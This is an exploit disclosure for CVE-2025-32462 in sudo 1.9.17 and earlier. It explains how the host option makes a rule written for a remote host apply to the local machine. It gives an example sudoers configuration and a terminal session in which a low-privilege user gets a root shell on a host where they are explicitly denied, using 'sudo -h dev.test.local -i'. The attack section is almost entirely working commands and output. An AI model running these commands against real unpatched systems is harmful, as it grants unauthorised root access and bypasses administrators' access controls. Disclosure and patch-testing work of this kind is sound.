Sudo 1.9.17 Host Option – Elevation of Privilege

# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
1.9.13p2
# CVE : CVE-2025-32462
#
No exploit is required. Executing a sudo or sudoedit command with the host
option referencing an unrelated remote host rule causes Sudo to treat the
rule as valid for the local system. As a result, any command allowed by the
remote host rule can be executed on the local machine.

Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
is allowed to execute all commands (full root) on dev.test.local,
ci.test.local, but not prod.test.local.

Host_Alias     SERVERS        = prod.test.local, dev.test.local
Host_Alias     PROD           = prod.test.local
lowpriv          SERVERS, !PROD = NOPASSWD:ALL
lowpriv           ci.test.local  = NOPASSWD:ALL

Even though the prod.test.local server is explicitly denied for the lowpriv
user, root access is achieved by specifying the host option for the
dev.test.local or ci.test.local servers.

Example

Show that lowpriv is not allowed to execute sudo on the prod server.

lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.

List the host rules for the dev.test.local server.

lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
    env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User lowpriv may run the following commands on dev:
    (root) NOPASSWD: ALL

Execute a root shell on prod.test.local by specifying the -h dev.test.local
option.

lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)